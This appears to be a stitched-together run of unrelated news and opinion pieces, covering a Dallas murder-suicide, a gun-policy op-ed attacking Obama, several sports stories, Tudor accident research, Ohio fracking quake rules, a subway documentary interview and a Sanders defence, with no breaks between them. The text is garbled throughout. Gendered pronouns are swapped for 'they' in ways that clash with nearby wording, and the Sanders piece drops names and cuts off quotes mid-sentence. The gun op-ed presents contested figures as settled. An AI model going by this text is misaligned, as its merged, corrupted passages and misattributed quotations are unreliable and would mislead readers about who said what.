According to information found on Facebook, Nick Pitofsky is survived by three children who live in Santa Rosa, Calif.
History With Firearms
Pitofsky was active on YouTube and posted many video reviews of guns they tested for a channel called the "Scout Tactical Channel."
In the most recent video, posted on Feb. 22, Pitofsky tested a tactical shotgun that they said they had bought for their wife, Vanessa.
“I purchased this as a self-defense weapon for my household, essentially for my wife. This is your basic home defense shotgun," Pitofsky said on the video, which has now been removed from YouTube.
Eerily, when commenting about a flashlight they had attached under the barrel of the weapon, Pitofsky said, “There are instances where people have accidentally shot family members.”
Dallas police could not confirm which weapon had been used in the murder-suicide incident.
NBC 5's Jeff Smith, Ken Kalthoff and Ray Villeda contributed to this report.
President Obama just can't seem to help himself. Over and over again, they make exaggerated or false claims about guns and crime.
Last year Obama kept asserting the bogus numbers such as “40 percent of all gun purchases take place without a background check.” Besides the study being based on a tiny survey it was started before the Federal background check law went into effect. Moreover, the 40 percent figure referred to all transfers, not just sales, and the vast majority of transfers took place within families through gifts and inheritances. Then, for good measure, Obama added an extra 4 percentage points to increase the number from 36 to 40 percent.
[pullquote]
Unfortunately, this past Tuesday Obama was at it again. They lamented:
"My biggest frustration has been that this society has not been willing to take some basic steps to keep guns out of the hands of people who can do just unbelievable damage. We are the only developed country on earth where this happens."
Does Obama not consider Norway a developed country? After all, Anders Breivik shot 69 people to death and wounded 110 others. That attack holds the record for a single-person shooting spree.
Is Germany a developed country? While the president focused on school shootings, they never acknowledged that two of the three worst K-12 school shootings have occurred in Germany since 2000, not in the United States. These were:
-- Erfurt, Germany on April 26, 2002: a former student killed 18 at a secondary school.
-- Winnenden, Germany, March 11, 2009: a 17-year-old former student killed 15 people, including nine students and three teachers.
A partial list of mass shootings in Europe from 2000 to early 2010 is available here.
Obama also claimed: "The idea, for example, that we couldn't even get a background check bill in to make sure that if you are going to buy a weapon you have to go through a fairly rigorous process so that we know who you are so that you can't just walk up to a store and buy a semi-automatic weapon makes no sense."
Obama ought to try purchasing a gun himself. They will realize it is not as easy as they think to buy a gun. No store in the entire United States can legally sell a semi-automatic gun without conducting a background check. Indeed, That has been the federal law for two decades now, since 1994.
"The combination of the NRA and gun manufactures are very well financed and have the capacity to move votes in local elections and congressional elections and so if you are running for election right now that's where you feel the heat."
Gun control advocates have plenty of money to get their message across. Thus last year, gun control advocates outspent their opponents by a ratio of 7.4 to 1 on television advertisements.
This year is shaping up to be just as lopsided. While the NRA spends about $20 million annually on political activities, former New York City Mayor Michael Bloomberg is spending about $50 million per year. And Gabreille Gifford's anti-gun organization is putting up another $20 million. Still others are putting in tens of millions more dollars. On top of that gun control advocates have a very sympathetic media that gets their points across.
“Our levels of gun violence are off the charts. There's no advanced, developed country on earth that would put up with this.”
The U.S. doesn't have the most gun murders among developed countries.
In any case, the total number of murders is the more important comparison and the U.S. murder rate is less than the average murder rate for the world. Nor is it close to having the highest murder rate among developed countries.
"...but that we are going to put some commonsense rules in place that make a dent, at least, in what's happening -- until that is not just the majority of you -- because that's already the majority of you, even the majority of gun owners believe that."
The surveys that Obama references by Michael Bloomberg are misleading. Asking if people support background checks on the "sale" of guns is not the same as asking them if they support background checks on transferring guns within families or the actual bills being put before congress. Clear majorities of Americans were actually happy that the gun control bill that Obama backed last year was defeated.
"Australia just said, well that is it, we aren't seeing that again and basically imposed very strict, tough gun laws and they haven't had a mass shooting since."
Pointing to one single country doesn't prove very much. For example, I could point to neighboring New Zealand, another isolated island nation that is demographically and economically similar, that appears to prove the exact opposite. From 1980 to 1996, New Zealand actually had a slightly higher mass murder rate (0.0050 incidents per 100,000 people versus Australia's 0.0042).
But while Obama points to Australia not have mass shootings since its gun regulations in 1997, New Zealand, which has remained a heavily armed country, has also not had any more mass shootings.
What needs to be done is a systematic study of many different areas to see whether changes in gun laws cause statistically significant differences in mass shootings. And that type of study is exactly what Bill Landes and I did for all the mass shootings in the US from 1977 to 1999, and we found clear evidence that the only type of gun law that made people safer was one that increased gun ownership.
If Obama had a stronger case for gun control, they wouldn't have to make up so many facts and distort others. But with policies such as background checks, which would have done nothing to stop any of the attacks, Obama has little choice but to make things up. However, getting policies right requires accurate facts.
Getty Images
The Broncos needed a cornerback in the wake of Chris Harris' torn ACL and they decided to sign one with some first-hand knowledge of their opponents in the AFC Championship Game.
The Broncos announced that they have signed cornerback Marquice Cole, who made several trips on and off the Patriots roster over the course of the 2013 season. Their last stay with the Pats ended 19 days ago and while it's fun to think this is all about tweaking the opposition, any tips they might be able to give the Broncos about New England's schemes are likely secondary to the Broncos' needs at corner with Harris out of the lineup.
Cole played 13 games with the Pats this season, making 15 tackles and intercepting one pass.
Harris was placed on injured reserve Tuesday, as was defensive end Derek Wolfe. Wolfe last played in Week 12 and has been out since suffering seizure-like symptoms on the way to the team's game in Kansas City the next week.
Denver also promoted offensive lineman Vinston Painter from the practice squad. Painter, a sixth-round pick in April, did not play any regular season games this season.
Image caption Here comes the summer: Death was a regular summer visitor in Tudor times
Summer was by far the most dangerous time of year for the Tudors, suggests research from the University of Oxford.
Fatal accidents were much more likely to take place during the agricultural peak season, a study of 16th Century coroner reports has revealed.
Cart crashes, dangerous harvesting techniques, horse accidents and windmill mangling were among the perils facing the Tudor farmworker.
Historian Steven Gunn has been studying 9,000 reports of Tudor misfortune.
They have found that between 1558 and 1560, almost three-quarters of fatal accidents took place during the summer months.
Farming equipment was sharp and lethal.
And the extra activity around watermills, windmills and overloaded carts also claimed a harvest of unfortunate victims, crushed, squashed or flattened.
Hay, watch out
There was also a case of someone falling asleep beside a hayrick which collapsed and then suffocated its drowsy victim.
In summertime, the living wasn't particularly easy. The rise in agricultural activity meant more likelihood of being trampled or injured by animals, including sheep and pigs - which was even more risky when it involved child labour.
Tudor lumberjack technique seems to have been a bit wanting Dr Steven Gunn, University of Oxford
A five-year-old pig herder from Huggate in Yorkshire was killed in an accident with their animals.
But the equivalent of traffic accidents were fatal incidents involving horses - with people falling off, being dragged along, trampled or kicked. Horses were responsible for more than nine out of 10 fatal accidents with animals.
In one case, a butcher's boy died falling into a pit in the roadside in St Martin-in-the-Fields in London, while bringing a horseload of meat through the city.
All those Shakespearean tales of forests are a reminder of how much woodland was part of the surroundings. And that meant more chances of falling from a height.
Falling out of trees when gathering fruit or nuts was part of the Tudor way of death.
But what about gathering crows? Dr Gunn says there were even handbooks specifically warning about the risks of climbing trees to get rid of crows' nests.
"It sounds like health and safety gone mad, but given that we have found several men who fell to their deaths doing just this, perhaps it was necessary," they said.
Cutting risks
Even pig farmers could suffer from such height hazards - as they fell out of oak trees looking for acorns in the early autumn.
Wood was also something of an accident waiting to happen. More than one in 10 fatal accidents involved cutting or shifting wood.
"Tudor lumberjack technique seems to have been a bit wanting. Men in Bedfordshire, Cumberland, Hampshire, Somerset, Westmorland and Yorkshire were all hit by ash, oak or poplar trees they were cutting down," said Dr Gunn.
There were other cases that just seemed unlucky.
John Broke, a Yorkshire cloth-maker, was "building a fence when an oak tree cut down some time before suddenly rolled downhill and hit him".
The project, funded by the Economic and Social Research Council, has been examining coroners' reports in the National Archives.
Dr Gunn's previous study highlighted a number of strange ways that people died, in accidents involving archery, dancing bears and early handguns.
But this latest analysis shows a pattern for when such fatal accidents were likely to have taken place.
"Deaths happened in various and unexpected ways," they say.
A bomb-sniffing dog cleared a suspicious package thrown onto a city bus Tuesday afternoon, more than an hour after the incident occurred.
About 4:25 p.m. Chicago police and fire officials were called to investigate when someone threw a bag onto a CTA bus and ran away, officials said. Eventually, bomb-sniffing dogs were called to the area of Kimball and Elston avenues in Irving Park.
A fire official said they did not know whether the bus was stopped or moving at the time. Whoever threw the bag onto the bus immediately ran away, the fire official said.
The bus was evacuated and additional public transportation in the area was being rerouted. It wasn't immediately clear what the passengers who exited the bus were instructed to do.
The fire official said a hazmat team had been called and police and firefighters were assessing the situation, about 4:50 p.m.
About 5:10 p.m. police issued a brief statement on the incident saying bomb and arson teams, as well as K-9 teams, were heading to the intersection.
They later updated their statement to say a K-9, as well as the bomb and arson unit had "cleared the package."
During their investigation, police had closed off several streets in the area, but the entire perimeter wasn't immediately known.
Blake Johnston, right, former footballer Warwick Capper, centre, and a fellow 'Dwarf My Party' entertainer pose for a picture on the company's website. Credit:Dwarf My Party The Saints released a statement on Tuesday night, saying the matter had now been dealt with to the satisfaction of all parties. "St Kilda Football Club wishes to advise that player Clinton Jones has offered their sincere apologies to entertainer Blake Johnston for an inadvertent action at a players' end of year celebration yesterday. The club has imposed a sanction of $3000 in accordance with the AFL Players Code of Conduct. Clinton has been in contact with AFL CEO Andrew Demetriou regarding the matter, which has now been dealt with in full by all involved." AFL chief executive Demetriou apologised for getting caught in a laughing fit on television when told that a dwarf had been allegedly set on fire during the Saints' Mad Monday celebrations. Demetriou, speaking on 3AW radio, said they would personally contact Johnston to apologise for their response on Channel Seven's Talking Footy, which has sparked anger from the public.
Entertainer Blake Johnston. The AFL boss claimed they thought the story was a joke, and only realised it was genuine when they realised media outlets were running with it online late Monday. The AFL's football operations manager, Mark Evans, has indicated the league could step in to handle the situation.
"It's with St Kilda at the moment and once they provide us the details we'll then have a look at it from there," Evans told AFL website on Tuesday.
They said the league had remained in constant contact with the club.
"The players have been playing pranks on each other by setting the shoelaces on fire, and singing happy birthday, and they've singed the clothing of a performer that they had there," Evans said. Management of Bells Hotel in South Melbourne, where the party took place, described the incident as a "storm in a tea cup". Demetriou revealed that St Kilda players had been warned less than a month ago about the importance of not misbehaving on Mad Monday.
"I was actually giggling in the beginning because I had been told by the producer during the break, before we went onto the next segment, and I thought they were having me on.
He's a performer who relies on their self-esteem and confidence to be able to perform at events like this...He's very distressed. "I thought it was a joke," Demetriou said on Tuesday. "It also preceded the fact we were talking about all the other issues we've had in the last 12 months - with Adelaide, Melbourne, Essendon, ASADA, we've had the issue with Stephen Milne and Adam Goodes, so when this was brought up, I just thought it was incredulous to think that this could possibly be," they said. "Because I had also been told that, for some inexplicable reason, that St Kilda players were walking around with a lighter and lighting the back of each others shirts. "It was inexcusable.
"After I found out that it was true, it's just reprehensible. I was flabbergasted because in the scheme of things, that was one thing I could have never predicted we would deal with. "It was not meant to be offensive and I apologise to anyone who is offended. "Certainly I will be in contact Blake Johnston today to find out how they are and also apologise. But I wasn't directing my laughter at him, I just couldn't believe that this situation had occurred." Demetriou said the AFL were in contact with St Kilda to find out the full facts, but would not say whether the league would get involved further. But they made it clear how angry they were that this incident was now another issue that could damage the game's brand. "I've been very public on my views about Mad Monday. I don't like Mad Mondays, I think they are a thing of a bygone era," they said.
"So when I was told that, for some reason that I could never possibly fathom, that there were people walking around with lighters lighting the back of each other's shirts, I just couldn't believe that. "I just couldn't believe that could be in this day and age. We spend our whole lives teaching children not to play with matches." Demetriou said they were told on Tuesday morning that AFL's cultural training staff had just completed visits to St Kilda and other clubs a few weeks ago. "They had just completed the St Kilda one and they talked about the end of season and the activites and this issue of Mad Monday came up ... how to put things in place to mitigate risk and behavioural aspects. "I don't understand, what the purpose of having lighters, we are talking about fire here, I don't get that.
"I understand that there was no damage done, but it doesn't excuse the behaviour.
"It certainly doesn't excuse my behaviour, and it certainly doesn't excuse what was happening at Mad Monday. It is just unacceptable. "On the lesser scale, it is completely silly and on the other end of the scale it is crazy, it's madness. A St Kilda spokesperson told Fairfax Media late on Monday night: "The club is investigating and is unable to add anything further at this time." Police investigation Victoria Police has confirmed police are investigating the incident after a complaint by Mr Johnston on Monday night.
"South Melbourne Crime Investigation Unit detectives are investigating an incident where a man has claimed that an unknown person set their clothing on fire with a cigarette lighter," a Victoria Police statement said. "The incident happened yesterday at a function in South Melbourne. The victim sustained minor injuries as a result of the incident," it said. A police media spokesperson said police would interview witnesses and use any available closed circuit television camera vision in its investigation. Demetriou's laughter The identity of the player or person who was allegedly involved in the incident is unknown.
Appearing as a guest on Channel 7's Talking Footy late on Monday night, Demetriou was informed about the incident by fellow panellist Luke Darcy, who said at the outset: "I want to start by saying we understand no one's been hurt". Demetriou tried to keep a straight face while Darcy was speaking, but began laughing when Darcy asked them if they were "used to this sort of thing".
When host Bruce McAvaney tried to change the subject to the Brownlow Medal and asked Demetriou for their opinion, Demetriou said: "I can't" and kept laughing. Moments later, McAvaney said Demetriou had "a bad minute or two". Demetriou responded by saying "I'm speechless, seriously." Reaction to the incident
Josh Damman, a co-entertainer with Johnston, demanded an apology from Demetriou. "Had it been a female entertainer who was set on fire, would they be laughing?" they said on their Facebook page on Tuesday. "Surely there would be an outrage made about it." They said Johnston deserves an apology from Demetriou, the AFL, St Kilda and the Talking Footy panel. Many football followers went to social media on Tuesday to voice their disapproval at the panel's reaction.
Johnston also performs as the professional wrestler "Mr Big" for Professional Championship Wrestling. A spokesperson from the wrestling company said in a statement that Johnston had sustained no injury, but was "very distressed" by the incident. "He's a performer who relies on their self-esteem and confidence to be able to perform at events like this. Tonight he's feeling very miserable and spending time with friends. He's very distressed," said the statement, which was read on Channel Nine's Footy Classified. "The players around them immediately helped them put the fire out and definitely weren't happy with what happened. "Blake was humiliated and left immediately. They were lit on fire on the lower back from behind and had no idea of it until feeling it."
It was reported that part of the Mad Monday celebrations involved players setting fire to the backs of other players' shirts. The other dwarf entertainer who performed at the celebrations, Arthur Penn Serevetas, told Channel Nine that Johnston was considering their options. "A player went behind my friend, got one of those gas lighters that you (use to) light up a stove and basically lit them up," they said. "Part of their shirt and pants got on fire and after that someone put it out and they just got ticked off and we basically left. That was the end of our gig, basically. "I mentioned to them after the gig, I said that, 'in my opinion, I think you should pursue it. I think you should get compensation for at least your shirt and pants'.
"And I told them them to make sure that their skin didn't get burnt or anything like that. "In my line of work, we do things that cross a certain line and boundary. But this is beyond." Mr Johnston is a director of Dwarf My Party, a entertainment hire agency. They have made appearances on television and performs at parties and functions, often billed as "Mr Big" Blake Johnston.
They grew up in Albany in Western Australia and lives in Melbourne's eastern suburbs.  They are 124 centimetres tall. "Grow up" Louise Connor, Victorian secretary of the entertainers' union, the Media Entertainment and Arts Alliance, condemned the attack on Mr Johnston saying that clubs should consider a code of conduct for players.
Life Underground filmmaker Hervé Cohen travels to more than a dozen cities looking for the most powerful stories from commuters.
The silence inside a subway car can be deafening as riders fixate their gaze on their phones, out the window, into blank space—on basically anything but their fellow passengers. Small talk isn't always welcomed (even if some urban dwellers are secretly begging for some kind of “genuine connection”). Yet the underground transit system is where strangers from more than a dozen cities opened up to the filmmaker Hervé Cohen with stories about family, relationships, fears, and goals. Most stories, they tell CityLab, are evoked through simple questions like Where are you coming from? or What was your last dream? In Berlin's U-Bahn, a young Syrian refugee dreams of their parents, who they no longer sees. In the New York subway, a jazz musician revealed their struggle to find a sense of belonging in the Big Apple. And in Brussels's metro, an elderly woman recounted their relationship with an American soldier during World War II. It's all part of Cohen's latest project, Life Underground, which features “living portraits” of commuters worldwide. The interactive documentary, set to come out in May, won't immediately head to the big screens. Instead, the interviews will be gradually released on an interactive map that allows viewers to pick and choose which interviews to watch. (Preview some of their videos online.)
Cohen may have conceived the idea years ago, but the message within the project resonates now more than ever. “A city is a crossroads where most of the people come from somewhere else, whether it's a little village in the country or from another country [altogether],” they say. “One of the goals is to make people realize that we are all humans, that we have common grounds.” When CityLab caught up with him, Cohen was preparing for their trip to Tokyo. He's already traveled to 10 other cities, from their hometown of San Francisco to Montreal and New York, to Vienna, Athens, Hong Kong, and Santiago. Here's our conversation: How did this project begin? I had this dream project that I kept writing about without having shot anything. So one day I said to myself, I need to really go underground and approach people. Thankfully, the first country I visited was Brazil, to São Paulo and Rio. It gave me a boost because over there, people are so open and approachable and even excited to talk. After that, I went to Paris and San Fransisco, where I live, and also Athens. Wherever I was traveling to for work, I would bring my camera and put aside a few hours or days, and I produced a few videos that helped [attract] partners. Last June was really when we started with funds, permits, and the UITP—an organization for public transportation worldwide—as a key partner. How do you decide who to talk to? It's really hard to explain. I'm not looking for the super good-looking people, or the super trendy. It could be somebody with a bouquet of flowers, like “where is this person going with it,” or it could be someone who has a suit on. I filmed in New York someone who was struggling with a table, and [it made me wonder], what's the story behind that? Sometimes people's expressions grab my attention, when I see them thinking hard, or really concentrated on their thoughts.
Why did you choose the subway as the setting? Do you think you would have gotten the same results in an open public space? In New York, for example, the world is there. The whole city takes the subway, rich, poor, religious, nonreligious. Filming in the subway allows me to take time to look at people, at their expression. There is a special internal atmosphere, with the tunnel lights and the noise and soundscape. You can just let go and think and be in your internal world. I used to read a lot on the subway, but I don't do it anymore. It's good to have a time off, to pause and to maybe have your thoughts go wild. That might also put you in the mood of introspection, and to be more open to one's feeling and thoughts. And with the time I had to film people, to [keep the camera] on their faces, it's like a living portrait. There's really nowhere else I could do that. Cities are changing fast. Keep up with the CityLab Daily newsletter. The best way to follow issues you care about. Subscribe Loading... What were some of the topics that came up in your travels? How did they differ from city to city? That was a key element of the project. Just talking to people, in two days, I can get an idea of what's the sensitivity and mood of a place, and take the pulse of the city. In both Hong Kong and Shenzhen, so many conversations were about parents' and children's relationship. About how to pay back their parents, how to not disappoint them. It was such a big worry for the young generation. “The world is there. The whole city takes the subway.” Athens is really interesting because of all the anxiety. There was no communication, and we would see people with their heads down. I remember this woman, maybe in their 60s, they had a beautiful hairdo, super distinguished and classy. They told us about how they used to be beautician, and then they retired. But because their three children were out of work, they had to take a job as a realtor. I always ask people what they had dreamt about at night, and they told me, “I really don't remember my dreams because I am so tired at the end of the day that I really fall deep into my sleep.” Sometimes they're all on their mobile phone, especially in Hong Kong and Shenzhen. They're really into their phones and it's harder to break the bubble. But in Santiago, Chile, oh my goodness. I had to stop asking people if they wanted to be part of the project, because they kept saying yes. And in four days, I had 16 people, and that was more than enough. People there look at each other. When there is music, they clap and even dance.
People are often said to be a bit aloof during their commutes. Efforts to get riders to talk with one another often meet resistance. How do you get people to open up to you? I work with film students, and that's maybe the trick. I work with really young and enthusiastic people who love the project, and in the countries where I don't speak the language I ask my assistant to approach the people. We ask to film them silently during their travel until they exit the subway, and afterwards, we would record them telling something about [themselves]. That's the pitch.
I think people need to talk. The questions, “where are you coming from?” and “where are you going?” might be very simple, but they often open to a story of a life. In Santiago, I was filming the city lights through the glass door [inside] a metro, and all of the sudden, through the reflection, I see a very melancholic young woman. They said, “I'm coming from a place where I saw my four-year-old son, with whom I don't live. I couldn't live with him, so every now and then I go and see them because I have to work. I was so young when I had this baby, so I could not afford to raise him.” From that point, they told us about their story and the fact that they were themselves abandoned by their mother at an early age. From that little question, we could develop an amazing heartbreaking family story. That was one of the most powerful moments. Did you get rejected often?
Of course! It's not easy. I was in Vienna a few days ago, it was difficult, especially old people. They wouldn't let us approach them. In New York, a plan of attack was to have somebody who was super good looking with me. [Laughs] It was funny because the first day I filmed in New York, I kept asking people and everybody was saying no. That was after my trip to Brazil, the country where everybody would say yes. All of a sudden, a guy looks at us and said, “You can film me if you want.” And they were from Brazil—of course. That was one the best [interviews]. He's a jazz musician in New York, and their narration was really beautiful. What was a particularly memorable story that you think resonates with the issues of today? I wanted to have immigrant stories—people from the Middle East, or Turkey, but it was very difficult to have them open up. When we would talk to them, though, it was just so beautiful to see their faces light up. One of the most beautiful stories that I got was in Berlin, from a Syrian refugee. They were a nice young man, good-looking, and something drew me to him. They couldn't speak German. I asked them where they were from, and they said [the Arabic word for] Syria. They couldn't say Syria in English. I couldn't imagine that they would tell the story that they told: Barely 18 and coming all the way from Syria, and crossing all these borders by himself. They were with a friend who spoke German, so when we did the interview, we had them reply in Arabic, the friend would translate from Arabic to German, and then my assistant would translate from German to English. [Each time] the translators would take just a moment to breathe, to swallow, before translating. I would grab the meaning of all of it, and I had some tears in my eyes. What do you want people to walk away with? The first [feedback is often] from people who work with me, who live in the cities. Many times after a shoot, they send me a note: “Now I look at people differently, I feel like talking to them.” I'm so glad when I hear that. It's a way for them to have a more human approach to their neighbors, and to people sitting next to them. We have stories, and we share more than we think, in every culture and every city. When we look at someone, we can go beyond their gaze.
As the summer transfer window ticked down to its close, you had to wonder whether Olivier Giroud was sharing the same excitement as those Arsenal fans who were boisterously preventing the poor Sky Sports News reporter from doing their job outside the Emirates.
Giroud was laid up with the three centimetre leg fracture that had occurred nine days earlier when their ankle and foot bones jarred together amid the freakish force of a Sylvain Distin clearance for Everton.
Arsenal had already spent £31 million on Alexis Sanchez but, in also recruiting £16m Danny Welbeck with just minutes of the transfer window remaining, they had added a second player with the potential to take Giroud's place. So was they worried? As Giroud prepares to make their comeback on Saturday against Manchester United after three months out, they could not be more emphatic. "We needed another striker," they say.
"It's good for competition. I think it will be better for the strikers to have plenty of options up front. I am happy with that.
"If you are good on the pitch, good in training you will have your chance. I'm not worried about my place. I have a strong mentality, I will be back. I think it was the best solution to buy Danny.  They are an important player for us, like Alexis. They have been doing well but I think there is still a place for me in this team."
And that place, says Giroud, is not necessarily at the expense of Welbeck or Sanchez. Although Giroud is clearly best suited to playing the central role, with their back to goal and linking up Arsenal's attacking play, both Sanchez and Welbeck have proved adept in any of the three attacking positions that surround the striker in Wenger's usual 4-2-3-1 formation. Wenger has also experimented this season both with two wingers in a 4-1-4-1 system and two strikers in an old school 4-4-2.
"Danny likes to move a lot," says Giroud. "I think me, Danny and Alexis are complementary. All three together? Why not?" Giroud then also mentions Mesut Ozil, Theo Walcott and Santi Cazorla.  They are adamant that, once the injuries subside, this Arsenal squad now has the potential to go beyond regular top four finishes and again win the Premier League title.
"The way the club has recruited these last few years, we can see the ambition," they say. "We spent a bit more money than before. I think we have everything except we had bad luck with some injuries these last months but I think we will do a good end of the season. Before we had the quality but not too much quantity. Now we have the quality and the quantity.
"Chelsea has a big advantage, 12 points, but you never know. It's not over - just keep the faith, keep going. We will fight to the end."
There is considerable frustration, though, both personally and collectively, at how Arsenal have made such a disjointed start.
Winning the FA Cup had felt like a turning point. They then beat Manchester City in the Community Shield and Giroud had just equalised in the 2-2 draw against Everton when they suffered their injury. The early season optimism, certainly among fans, has dissipated and they enter the match against United after losing leads against both Anderlecht - from 3-0 up - and also Swansea City.
"We need consistency, but we also need to know how to close out the game after winning it," says Giroud.
"I could not believe what I was watching (against Anderlecht). That is one of our weaknesses, we don't know how to close the game when we are winning. We must just stay at the back and not take too much risk. I don't know from where it comes but we need to improve ourselves in this way."
Another area where Arsenal must surely improve is in injury prevention, although Giruoud is sure that their own problem was down simply to bad luck rather than the stress of all the games they had played last season.
"It was the force of the ball," they say. "It made my foot bone and ankle come together and cracked. I thought I had just twisted my ankle but it was a clear fracture. It was just bad luck, maybe a bit of tiredness when you are fragile but I felt good on the pitch. I didn't feel tired. I think it was bad luck - and Distin is a strong boy. I was comfortable and happy to play almost every game last year."
The initial prognosis was that Giroud would not play again until 2015 but here they are, back available, a full month ahead of schedule. Arsenal also announced last month that Giroud had agreed a contract extension and, although they say that they actually signed the deal before their injury, they are clearly central to Wenger's planning.
"I worked hard in the last few months - sweated a lot," they say. "It's now all about getting a good rhythm back, getting competition. I can't wait. I have shown from the first year here that I can improve.
"I'm 28 next month - I'm still young. The FA Cup win was fantastic, even more when you hadn't won something for nine years. We felt the pressure year after year. We are proud to have done this together but we want to do more. I think the best years are in front of me and I think we have a squad to do something great in the future."
Olivier Giroud features in the new 4K Microtising campaign from Sony, the smallest ever advertising in football
COLUMBUS, Ohio -- The Seattle Seahawks haven't played in Cleveland since 2011. That was before shale gas and hydraulic fracturing were an issue.
The Browns beat them back then -- 6-3 in front of 66,350 fans. Now, another Seahawk visit, and all their stomping and cheering, could have geological and political implications.
Seahawk fans go way beyond the Dawg Pound. They have caused earthquakes.
Minor quakes as quakes go, measuring between 1.0 and 2.0.
But that's large enough to set off the alarms under the new special permitting rules the Ohio Department of Natural Resources has issued on hydraulic fracturing of horizontal wells in Ohio's Utica shale.
Any company looking for a permit to drill and fracture the Utica shale under the Buckeye state must now first check to see whether there are fault lines - cracks - in the rock within three miles of the proposed well.
If geologic maps show there are faults -- or if minor quakes greater than 2.0 have already occurred in an area where a well is being considered -- drillers will have to first set up a seismic monitoring network.
Any seismic shaking during the fracturing that measures greater than 1.0 -- impossible for most people to feel but well within the range of Seahawk fans' foot stamping and cheering ability -- means all work must stop until the state figures out where the quake came from. If the quake can be linked to the well, the state can permanently suspend operations at the site.
That's the rule that the Ohio Department of Natural Resources announced Friday. And on Monday, the department began re-evaluating some 400 permits for wells that have not yet been drilled. Some of those permits may be amended under the new permit standards.
"While we can never be 100 percent sure that drilling activities are connected to a seismic event, caution dictates that we take these new steps to protect human health, safety and the environment," said James Zehringer, director of the department, in a prepared statement. "Not only will this reasonable course of action help to ensure public health and safety, but it will also help us to expand our underground maps and provide more information about all types of seismicity in Ohio."
Nobody in the industry has seen the exact language of the permit changes, but the political trembles have begun anyway.
Thomas Stewart, executive vice president of the Ohio Oil and Gas Association, spent most of the weekend and all day Monday talking to oil and gas companies, and to lawmakers.
Although the new permit conditions don't require a change in the law, legislators were curious about the issue, they said.
And so is the industry.
"My colleagues across the country are expressing concern about this," Stewart said. "And we are talking to our members in Ohio.
"The wider concern is whether this means that a large swath of people's property is taken off the table. And if you, a company, have a lease, will you not be able to drill it?"
Quoting a CNN report from 2013, Stewart said the U.S. Geologic Survey has estimated that about 1.3 million earthquakes occur annually that register between 2.0 and 2.9. They are classified as minor.
"The Appalachian Basin (of which eastern Ohio is part) is ancient, and ancestral faulting is known to be all over the place," they said. "That's true almost everywhere you drill for oil and gas.
"There is not a geologist in the world surprised by faulting. It is when you are on a slip fault where there are different pressures, where you get seismic event," they said.
The new quake rules are in response to a series of earthquakes in Poland Township near Youngstown last month. The department of natural resources determined the epicenter was under a well being fractured. The state has suspended drilling and fracturing operations there.
"The ODNR has performed its mission, which we support," said Stewart. "It has tried to look at this event in Youngstown and come up with a response.
"It needs refinement and understanding. The governor and the industry need to put this into perspective and understand the economic consequences of what they are proposing."
To be afraid is to behave as if the truth were not true. ~Bayard Rustin
UPDATE #1: This story was updated at 7:35 a.m. to include information about Jonathan Allen.
The attack was initiated when Jonathan Allen , whofirst " reported " this "story," uncovered the resolution Sanders signed as mayor of Burlington, VT in 1982. Allen is a political lapdog of the Democratic Party establishment. They worked for DNC Chairwoman Debbie Wasserman-Schultz , who was a co-chair of Clinton's 2008 presidential campaign and co-authored Hillary's biography, HRC: State Secrets and the Rebirth of Hillary Clinton However, Allen's assertion has a fatal flaw. Nothing could be further from the truth than the theory they offer as proof positive that Bernie supported marriage asbetween a man and a woman. A look at the facts in their historical context determines the (in)significance of this potentially slanderous accusation by the Clinton camp, which Williamson L. Henderson, V , Chairman of the STONEWALL Rebellion Veterans' Association (SVA), called "Fact #1: This is a resolution of the Board of Aldermen (which essentially is their city council) of Burlington, Vermont. A resolution is a statement supported by at least a majority of a governing body.Fact #2: A mayor routinely signs proclamations and resolutions proffered by legislative bodies on a wide number of topics and subjects. Such proclamations are not bills and do not become law. Rather, they are an official statement supported by majority of a governing body.Fact #3: This particular resolution supports "We Believe in Marriage Week," a nation-wide attempt to stem the rising tide of divorce sweeping the nation, which other boards of aldermen supported via similar resolutions declaring the week from February 14-20, 1982 as such.Fact #4: The rising divorce rate and increase in the number of out-of-wedlock children being born were of particular unilateral, bipartisan concern, according to Henderson. Assistant Secretary of Labor Daniel Patrick Moynihan (whom Clinton replaced when they ran for Senator in New York in 2000) issued a report in 1965 essentially decrying a condemnation into poverty, particularly of minority families, who were being broken apart due to divorce and single-parent households.Fact #5: The terms "family values" and "traditional marriage" did not have the anti-LGBTQ meaning in 1982 that they do today. They were, instead, concerns over the family unit falling apart due to the increase in divorce and out-of-wedlock childbirth. Henderson further stated, "In 1982, nobody in the LGBTQ community was fighting for the right to marry. "," recalled, an LGBTQ activist, historian, and videographer.Neither was it seriously on the agenda more than a decade later. In 1999, the first openly-lesbian elected official in New York State,(D-NY) held a debate on the issue of marriage equality with, the first openly gay Republican from Peekskill, NY who was running for the Peekskill City Council: "bourgeois" Schmidt, the first elected official in NY to sign a statewide petition for marriage equality, recalled.As I have previously about , the LGBTQ community is losing its history , as well as its core values. If younger members of our community were more connected with our elders, this sort of political attack never would have been allowed. "," Wallace interjected.In fact, at the time this resolution was passed, there were no legal protections for LGBTQ individuals anywhere in the USA! One month later, Wisconsin became the first state to ban discrimination on the basis of sexuality. When Sanders passed a city ordinance banning discrimination against gays and lesbians a year later, they were at they forefront of the LGBTQ rights movement.What is deeply troubling to me is that Speaker Quinn (whom I heartily endorsed when they ran for Mayor of NYC in 2013), Senator Hoylman, and Mr. LaSalvia are all old enough to know better. They lived through the culture of the time in 1982, when police were conducting raids and mass arrests of gay and lesbian individuals, often facing up to 20 or more years in prison for the "crime" of being gay.," Schmidt, who now identifies as Libertarian, stated." Henderson scoffed.As an LGBTQ rights activist, I am deeply offended by the Clinton campaign's attempt to use a vile distortion of the struggle in our movement for equality, as a political attack. The campaign, and, owe Sanders an apology.
CLOSE The composure Purdue needed to win big games never showed through. Nathan Baird/Journal & Courier
Purdue head coach Matt Painter argued a call while facing Arkansas Little Rock in the first-round of the men's NCAA tournament on Thursday. (Photo: Brennan Linsley/AP)
Purdue can't keep doing this. Purdue fans know it. Guess who else knows it? The Purdue coach.
Matt Painter knows they made mistakes at the end of the Little Rock game Thursday in Denver, a fiasco that saw Purdue turn a 13-point lead in the final 3½ minutes into a season-ending 85-83 loss in double overtime. It's too similar to the loss that ended last season, when ninth-seeded Purdue turned a seven-point lead in the final 50 seconds of regulation into a season-ending loss in overtime to eighth-seeded Cincinnati.
“I've got to be a better coach,” Painter said after the loss Thursday, and they didn't stop there. They listed the ways.
Painter referenced Vince Edwards' mental lapse late in regulation, after Little Rock's 3-pointer tied the score at 70, saying they should have called timeout when they saw what Edwards conceded later: “I wasn't aware (of the time and score),” Edwards said. “That's a mistake on my part mentally. Just not knowing time, knowing score.”
